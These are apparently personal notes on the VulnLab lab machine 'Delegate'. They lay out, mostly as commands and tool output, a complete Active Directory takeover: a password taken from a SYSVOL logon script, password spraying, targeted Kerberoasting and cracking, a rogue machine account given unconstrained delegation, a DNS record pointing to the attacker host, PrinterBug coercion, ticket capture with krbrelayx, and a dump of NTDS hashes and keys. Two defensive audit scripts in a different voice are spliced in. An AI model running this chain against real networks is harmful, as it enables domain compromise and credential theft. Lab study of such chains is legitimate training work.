Delegate
This is not a writeup, just my notes about VulnLabs machines.
Operating System:
Chain: False
A.Briggs | P4ssw0rd1#123 | Found in file | Domain User
N.Thompson | KALEB_2341 | GenericWrite + Append fake SPN | Domain User
✅ Valid Usernames
Administrator@delegate.vl
R.Cooper@delegate.vl
J.Roberts@delegate.vl
Guest@delegate.vl
N.Thompson@delegate.vl
A.Briggs@delegate.vl
DC1$@delegate.vl
🔑 Passwords list
P4ssw0rd1#123
KALEB_2341
Nmap Scan
# Nmap 7.94SVN scan initiated Mon Apr 7 20:52:22 2025 as: nmap -sS -p- -A --open -T5 -Pn -n -oN ext_delegate_tcp_allports -vvv 10.10.77.192
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-04-08 00:59:02Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: delegate.vl0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: delegate.vl0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
47001/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49669/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49670/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49672/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49683/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49685/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
56221/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
56250/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Not Vulnerable to DNS Zone Transfer
Domain SID: S-1-5-21-1484473093-3449528695-2030935120
Server allows null session authentication
Server allows guest session authentication
RID-Enumeration returned a list of valid usernames
IPC$, NETLOGON and SYSVOL possess Write permissions
File: /SYSVOL/delegate.vl/scripts/users.bat
-----------------------------------------------------------------------------------------
rem @echo off
net use * /delete /y
net use v: \\dc1\development
if %USERNAME%==A.Briggs net use h: \\fileserver\backups /user:Administrator P4ssw0rd1#123
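The finding above is a literal password in a logon script that every domain user can read. As an added example (not part of the original notes), this sketch flags `net use` lines that carry an inline password; the function name and line 5 of the sample are constructed for illustration.

```python
import re

NET_USE = re.compile(r'\bnet\s+use\b(.*)', re.IGNORECASE)
TOKEN = re.compile(r'"[^"]*"|\S+')            # quoted argument or bare word
DEVICE = re.compile(r'^(?:[a-z]:|\*)$', re.IGNORECASE)

# Lines 1-4 are the users.bat shown above; line 5 is constructed to show the
# "*" (prompt for password) form, which must not be reported.
SAMPLE = r"""rem @echo off
net use * /delete /y
net use v: \\dc1\development
if %USERNAME%==A.Briggs net use h: \\fileserver\backups /user:Administrator P4ssw0rd1#123
net use t: \\dc1\tools * /user:delegate\svc_constructed
"""

def find_inline_passwords(script_text):
    """Return (line_no, user, share) per 'net use' line carrying a literal password.

    The password itself is deliberately left out of the result so that the
    audit report does not become another copy of the secret.
    """
    findings = []
    for line_no, line in enumerate(script_text.splitlines(), start=1):
        match = NET_USE.search(line)          # also matches after an "if ..." prefix
        if not match:
            continue
        user, share, positional = None, None, []
        for i, raw in enumerate(TOKEN.findall(match.group(1))):
            tok = raw.strip('"')
            if tok.lower().startswith('/user:'):
                user = tok.split(':', 1)[1]
            elif tok.startswith('/'):
                continue                      # other switches: /delete, /y, ...
            elif tok.startswith('\\\\'):
                share = tok                   # UNC path being mapped
            elif i == 0 and DEVICE.match(tok):
                continue                      # drive letter, or "*" = next free device
            else:
                positional.append(tok)        # password position
        if share and any(p != '*' for p in positional):
            findings.append((line_no, user, share))
    return findings

if __name__ == "__main__":
    for line_no, user, share in find_inline_passwords(SAMPLE):
        print(f"line {line_no}: literal password for {user} on {share}")
```

Run it over every script under SYSVOL and NETLOGON; any hit means the credential should be rotated and the mapping moved to a mechanism that does not store the secret in the file.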
❯ nxc smb 10.10.77.192 -u users.txt -p 'P4ssw0rd1#123' --continue-on-success
SMB 10.10.77.192 445 DC1 [+] delegate.vl\A.Briggs:P4ssw0rd1#123
No kerberoastable users
No AS-REP roastable users
❯ bloodhound-python -c all --zip -ns 10.10.77.192 -u A.Briggs -p 'P4ssw0rd1#123' -d delegate.vl
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: delegate.vl
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc1.delegate.vl
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc1.delegate.vl
INFO: Found 9 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC1.delegate.vl
INFO: Done in 00M 32S
INFO: Compressing output into 20250407212413_bloodhound.zip
❯ python3 targetedKerberoast.py -d delegate.vl -u A.Briggs -p 'P4ssw0rd1#123' --request-user 'N.Thompson'
[*] Starting kerberoast attacks
[*] Attacking user (N.Thompson)
[+] Printing hash for (N.Thompson)
$krb5tgs$23$*N.Thompson$DELEGATE.VL$delegate.vl/N.Thompson*$4568b4ebc9930ccc1f48ea83c45b0727$<SNIF>
❯ hashcat -m 13100 n.thompson.kerberoast /usr/share/wordlists/rockyou.txt
<SNIF>
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
$krb5tgs$23$*N.Thompson$DELEGATE.VL$delegate.vl/N.Thompson*$4568b4ebc99<SNIF>:KALEB_2341
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> whoami /all
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============================================== ==================================================
DELEGATE\delegation admins Group S-1-5-21-1484473093-3449528695-2030935120-1121 Mandatory group, Enabled by default, Enabled group
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================================================== ======= Enabled
SeMachineAccountPrivilege Add workstations to domain Enabled
SeEnableDelegationPrivilege Enable computer and user accounts to be trusted for delegation Enabled
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> Import-Module .\Powermad.ps1
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> New-MachineAccount -MachineAccount EVIL -Password $(ConvertTo-SecureString 'Password123' -AsPlainText -Force)
[+] Machine account EVIL added
WORKSTATION_TRUST_ACCOUNT | 4096 | Indicates a machine account (mandatory)
TRUSTED_FOR_DELEGATION | 524288 | Enables unconstrained delegation
Total: 524288 + 4096 = 528384
#Enable unconstrained delegation by setting the userAccountControl attribute to 528384
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> Set-MachineAccountAttribute -MachineAccount evil -Attribute useraccountcontrol -Value 528384
[+] Machine account evil attribute useraccountcontrol updated
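From the defender's side, the same flag arithmetic is what an audit has to decode. As an added example (not part of the original notes), this sketch decodes userAccountControl values and reports enabled non-DC accounts trusted for unconstrained delegation; the inventory rows other than the 528384 value are constructed, and the function names are illustrative.

```python
# userAccountControl bits as documented by Microsoft (subset relevant to delegation).
UAC_FLAGS = {
    0x0000002: "ACCOUNTDISABLE",
    0x0000200: "NORMAL_ACCOUNT",
    0x0001000: "WORKSTATION_TRUST_ACCOUNT",       # 4096
    0x0002000: "SERVER_TRUST_ACCOUNT",            # 8192, domain controllers
    0x0080000: "TRUSTED_FOR_DELEGATION",          # 524288, unconstrained delegation
    0x0100000: "NOT_DELEGATED",
    0x1000000: "TRUSTED_TO_AUTH_FOR_DELEGATION",
}

# Constructed inventory of (sAMAccountName, userAccountControl). 528384 is the
# value set on the page; the other rows are typical values chosen for contrast.
SAMPLE_ACCOUNTS = [
    ("DC1$", 532480),      # SERVER_TRUST_ACCOUNT + TRUSTED_FOR_DELEGATION
    ("EVIL$", 528384),     # WORKSTATION_TRUST_ACCOUNT + TRUSTED_FOR_DELEGATION
    ("WS01$", 4096),       # ordinary workstation (hypothetical)
    ("OLDSRV$", 528386),   # delegation flag set, account disabled (hypothetical)
    ("A.Briggs", 512),     # ordinary user
]

def decode_uac(value):
    """Return the known flag names set in a userAccountControl value, low bit first."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]

def audit_unconstrained(accounts):
    """Return enabled non-DC accounts trusted for unconstrained delegation."""
    findings = []
    for name, uac in accounts:
        flags = decode_uac(uac)
        if "TRUSTED_FOR_DELEGATION" not in flags:
            continue
        if "SERVER_TRUST_ACCOUNT" in flags:       # expected on domain controllers
            continue
        if "ACCOUNTDISABLE" in flags:             # disabled: report separately for cleanup
            continue
        findings.append((name, uac, flags))
    return findings

if __name__ == "__main__":
    for name, uac, flags in audit_unconstrained(SAMPLE_ACCOUNTS):
        print(f"{name}: userAccountControl={uac} -> {', '.join(flags)}")
```

Any account this reports deserves review, together with who holds SeEnableDelegationPrivilege and SeMachineAccountPrivilege, since those two rights are what allowed the flag to be set here.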
Note: make the computer account look like a real service by adding the SPN HTTP/EVIL.delegate.vl
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> Set-MachineAccountAttribute -MachineAccount evil -Attribute ServicePrincipalName -Value HTTP/EVIL.delegate.vl -Append
[+] Machine account evil attribute ServicePrincipalName appended
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> Get-MachineAccountAttribute -MachineAccount evil -Attribute ServicePrincipalName -Verbose
Verbose: [+] Domain Controller = DC1.delegate.vl
Verbose: [+] Domain = delegate.vl
Verbose: [+] Distinguished Name = CN=evil,CN=Computers,DC=delegate,DC=vl
HTTP/EVIL.delegate.vl
RestrictedKrbHost/EVIL
HOST/EVIL
RestrictedKrbHost/EVIL.delegate.vl
HOST/EVIL.delegate.vl
❯ python3 dnstool.py -u 'delegate.vl\evil$' -p 'Password123' -r evil.delegate.vl -d 10.8.5.48 -a add dc1.delegate.vl -dns-ip 10.10.111.117
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully
The record takes time to replicate; use nslookup evil.delegate.vl dc1.delegate.vl to make sure it has replicated into AD.
❯ python3 krbrelayx.py -hashes :58a478135a93ac3bf058a5ea0e8fdb71
The -hashes value is the NT hash of the machine account password: pypykatz crypto nt 'Password123'
❯ python3 printerbug.py delegate.vl/'EVIL$:Password123'@10.10.111.117 evil.delegate.vl
[*] Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Attempting to trigger authentication via rprn RPC at 10.10.111.117
[*] Bind OK
[*] Got handle
DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Triggered RPC backconnect, this may or may not have worked
❯ python3 krbrelayx.py -hashes :58a478135a93ac3bf058a5ea0e8fdb71
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client SMB loaded..
[*] Running in export mode (all tickets will be saved to disk). Works with unconstrained delegation attack only.
[*] Running in unconstrained delegation abuse mode using the specified credentials.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up DNS Server
[*] Servers started, waiting for connections
[*] SMBD: Received connection from 10.10.111.117
[*] Got ticket for DC1$@DELEGATE.VL [krbtgt@DELEGATE.VL]
[*] Saving ticket in DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache
[*] SMBD: Received connection from 10.10.111.117
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
[*] SMBD: Received connection from 10.10.111.117
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
❯ KRB5CCNAME='DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache' impacket-secretsdump -k -no-pass dc1.delegate.vl -just-dc
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c32198ceab4cc695e65045562aa3ee93:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:54999c1daa89d35fbd2e36d01c4a2cf2:::
<SNIF>
❯ impacket-addcomputer delegate.vl/N.Thompson:KALEB_2341 -computer-name z3r0 -computer-pass Password123
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Successfully added machine account z3r0$ with password Password123.
❯ bloodyAD -u 'N.Thompson' -p 'KALEB_2341' --host dc1.delegate.vl -d delegate.vl add uac 'z3r0$' -f TRUSTED_FOR_DELEGATION
[-] ['TRUSTED_FOR_DELEGATION'] property flags added to z3r0$'s userAccountControl
❯ bloodyAD -u 'N.Thompson' -p 'KALEB_2341' --host dc1.delegate.vl -d delegate.vl add uac 'z3r0$' -f WORKSTATION_TRUST_ACCOUNT
[-] ['WORKSTATION_TRUST_ACCOUNT'] property flags added to z3r0$'s userAccountControl
❯ bloodyAD -u 'N.Thompson' -p 'KALEB_2341' --host dc1.delegate.vl -d delegate.vl get object 'z3r0$' --attr 'useraccountcontrol'
❯ python3 ./addspn.py -u 'delegate.vl\N.Thompson' -p 'KALEB_2341' -s 'HTTP/z3r0.delegate.vl' -t 'z3r0$' -dc-ip 10.10.79.76 dc1.delegate.vl
❯ python3 ./addspn.py -u 'delegate.vl\N.Thompson' -p 'KALEB_2341' -s 'CIFS/z3r0.delegate.vl' -t 'z3r0$' -dc-ip 10.10.79.76 dc1.delegate.vl
❯ bloodyAD -u 'N.Thompson' -p 'KALEB_2341' --host dc1.delegate.vl -d delegate.vl get object 'z3r0$' --attr 'serviceprincipalname'
❯ python3 krbrelayx.py -hashes :58a478135a93ac3bf058a5ea0e8fdb71
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client SMB loaded..
[*] Running in export mode (all tickets will be saved to disk). Works with unconstrained delegation attack only.
[*] Running in unconstrained delegation abuse mode using the specified credentials.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
❯ python3 printerbug.py 'delegate.vl/z3r0$:Password123'@10.10.79.76 z3r0.delegate.vl
[*] Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Attempting to trigger authentication via rprn RPC at 10.10.79.76
[*] Bind OK
[*] Got handle
DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Triggered RPC backconnect, this may or may not have worked
[*] Setting up DNS Server
[*] Servers started, waiting for connections
[*] SMBD: Received connection from 10.10.79.76
[*] Got ticket for DC1$@DELEGATE.VL [krbtgt@DELEGATE.VL]
[*] Saving ticket in DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache
[*] SMBD: Received connection from 10.10.79.76
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
[*] SMBD: Received connection from 10.10.79.76
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
❯ KRB5CCNAME='DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache' impacket-secretsdump -k -no-pass dc1.delegate.vl -just-dc-user Administrator
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c32198ceab4cc695e65045562aa3ee93:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:f877adcb278c4e178c430440573528db38631785a0afe9281d0dbdd10774848c
Administrator:aes128-cts-hmac-sha1-96:3a25aca9a80dfe5f03cd03ea2dcccafe
Administrator:des-cbc-md5:ce257f16ec25e59e
[*] Cleaning up...
UserAccountControl Values: